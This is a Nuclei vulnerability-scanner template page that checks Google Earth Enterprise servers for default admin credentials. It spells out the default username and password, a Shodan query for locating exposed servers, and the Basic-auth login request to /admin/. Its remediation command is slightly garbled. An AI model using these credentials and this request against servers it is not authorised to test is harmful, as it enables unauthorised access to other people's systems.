Google Earth Enterprise Default Login

ID: google-earth-dlogin

Severity: high

Author: orpheus,johnjhacking

Tags: default-login,google-earth

Description

Google Earth Enterprise default login credentials were discovered.

YAML Source

id: google-earth-dlogin

info:
  name: Google Earth Enterprise Default Login
  author: orpheus,johnjhacking
  severity: high
  description: |
    Google Earth Enterprise default login credentials were discovered.
  remediation: |
    To reset the username and password:

    sudo /opt/google/gehttpd/bin/htpasswd -c
    /opt/google/gehttpd/conf.d/.htpasswd geapacheuse"
  reference:
    - https://johnjhacking.com/blog/gee-exploitation/
    - https://www.opengee.org/geedocs/5.2.2/answer/3470759.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
    shodan-query: title:"GEE Server"
  tags: default-login,google-earth

http:
  - raw:
      - |
        GET /admin/ HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    attack: pitchfork
    payloads:
      username:
        - geapacheuser
      password:
        - geeadmin

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        condition: and
        words:
          - 'DashboardPanel'
          - 'Earth Enterprise Server'
# digest: 4a0a00473045022100b4142ecceadfe2016af097e57b424042020eb4701747a55e86e0a253cfd6bf9602206d5d376a58dc62ad81e5f637470047409d761e190cfcef0f9accd711ee95d428:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/default-logins/google/google-earth-dlogin.yaml"

View on Github